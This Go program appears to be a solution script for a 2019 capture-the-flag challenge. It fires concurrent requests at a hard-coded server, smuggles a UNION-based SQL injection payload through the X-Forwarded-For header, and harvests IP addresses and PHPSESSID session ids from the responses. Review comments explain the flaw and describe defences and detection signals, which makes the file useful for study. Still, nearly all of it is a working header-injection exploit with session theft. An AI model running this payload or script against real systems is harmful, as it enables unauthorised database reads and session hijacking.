// https://cybertalents.com/competitions/quals-saudi-oman-national-cyber-security-ctf-2019/maria/
// 🂁 ctrezevant@sdf ~ $ time go run ctf.go
// go run ctf.go 1.17s user 0.45s system 48% cpu 3.341 total
package main | |
import ( | |
"fmt" | |
"math/rand" | |
"net/http" | |
"regexp" | |
"sync" | |
"time" | |
) | |
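// main sends 30 concurrent requests to the hard-coded challenge URL, one per
// session-row id in [0, 30), and waits for all of them to finish.
//
// The query template is delivered in the X-Forwarded-For request header (see
// sendPayload); the %d verb is filled with the row id.
func main() {
	url := "http://35.222.174.178/maria/"
	payload := "kfdad' or id = '6969' union select 'test',1,2,(select ip_address from nxf8_sessions WHERE id=%d) from nxf8_sessions--"

	var wg sync.WaitGroup
	for i := 0; i < 30; i++ {
		// Add must happen before the goroutine is started. Calling it inside
		// the goroutine races with wg.Wait below, which can then return (and
		// end the program) before any worker has registered itself.
		wg.Add(1)
		go func(offset int) {
			// Deferred so the counter is released even if sendPayload panics.
			defer wg.Done()
			// Small random jitter (3-5 microseconds) before each request.
			time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
			sendPayload(&url, &payload, offset)
		}(i)
	}
	wg.Wait()
}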
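// noLetters matches a non-empty string that contains no ASCII letters.
// sendPayload uses it as a loose "looks like an IP address" test; it does not
// validate the value as an address. Compiled once instead of on every call.
var noLetters = regexp.MustCompile(`^[^a-zA-Z]+$`)

// sendPayload issues one GET request to *url with the X-Forwarded-For header
// set to *query formatted with offset, then inspects the PHPSESSID cookies of
// the response. When it finds both a letter-free value (treated as an IP
// address) and an ordinary session id, it prints them with the offset.
// Errors and non-200 responses are reported on stdout and the call returns.
//
// NOTE(review): the server presumably copies X-Forwarded-For into a SQL
// statement and reflects the result in a PHPSESSID cookie; that is inferred
// from what this client looks for, not visible here. The header is set by the
// client, so a server has to treat it as untrusted: accept it only from known
// proxies, validate it as an IP address, and bind it as a query parameter
// instead of concatenating it. A header value containing quotes or SQL
// keywords instead of an address is a usable detection signal in access logs.
func sendPayload(url, query *string, offset int) {
	// Guard against nil pointers instead of panicking on dereference.
	if url == nil || query == nil {
		fmt.Println("sendPayload: nil url or query")
		return
	}

	// A bounded timeout keeps a stalled server from hanging the worker (and
	// therefore the WaitGroup in the caller) forever.
	client := &http.Client{Timeout: 10 * time.Second}

	req, err := http.NewRequest("GET", *url, nil)
	if err != nil {
		fmt.Println("sendPayload: " + err.Error())
		return
	}
	req.Header.Add("X-Forwarded-For", fmt.Sprintf(*query, offset))

	res, err := client.Do(req)
	if err != nil {
		fmt.Println("sendPayload: " + err.Error())
		return
	}
	// The body is never read, but it must still be closed to release the
	// underlying connection.
	defer res.Body.Close()

	if res.StatusCode != http.StatusOK {
		fmt.Printf("sendPayload: status %d for offset %d\n", res.StatusCode, offset)
		return
	}

	var ipAddr, sessionID string
	for _, c := range res.Cookies() {
		if c.Name != "PHPSESSID" {
			continue
		}
		switch {
		case noLetters.MatchString(c.Value):
			ipAddr = c.Value
		case c.Value != "deleted":
			// "deleted" is skipped: it is a placeholder value, not a session id.
			sessionID = c.Value
		}
	}

	if ipAddr != "" && sessionID != "" {
		fmt.Printf("[ID: %d IP: %s SESSID: %s]\n", offset, ipAddr, sessionID)
	}
}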